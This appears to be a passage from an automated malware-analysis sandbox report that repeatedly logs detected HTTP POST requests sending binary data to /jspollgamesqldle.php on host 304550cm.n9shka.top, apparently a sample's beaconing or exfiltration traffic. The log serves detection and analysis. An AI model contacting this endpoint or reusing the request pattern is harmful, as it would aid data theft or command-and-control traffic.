                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1388Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1388Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
